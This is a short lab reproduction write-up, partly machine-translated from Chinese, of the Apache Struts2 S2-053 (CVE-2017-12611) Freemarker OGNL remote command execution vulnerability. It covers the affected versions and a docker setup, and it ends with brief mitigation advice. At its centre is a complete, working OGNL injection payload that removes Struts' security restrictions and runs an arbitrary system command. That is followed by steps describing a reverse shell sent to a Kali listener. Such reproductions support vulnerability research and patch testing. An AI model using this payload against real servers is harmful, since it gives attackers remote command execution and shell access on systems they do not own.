Apache struts2 Freemarker label remote command execution _CVE-2017-12611 (S2-053) vulnerability reproducibility
First, Vulnerability Description
When using Struts2 Freemarker module engine, while allowing OGNL analytical expressions. Leading to user-entered data itself is not OGNL resolved, but due to being resolved Freemarker leave after one becomes an expression is parsed OGNL second time, leading to arbitrary command execution vulnerability.
Second, the flaw affects versions
Struts 2.0.1-struts 2.3.33
Struts 2.5-Struts 2.5.10
Third, the vulnerability environment to build
1. Use the built environment docker
Fourth, the vulnerability reproduction
1, startup environment
2, browser access
POC as follows:
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} 注: 执行命令的地方在于(#cmd=’id’)
3、查看用户所属组
4、反弹shell,把shell反弹到kali上
5、在kali 端开启监听,可以看到成功获得目标反弹过来的shell
五、漏洞防御
1、 Apache Struts版本最新版本
2、 Freemarker标签不要通过Request方式获取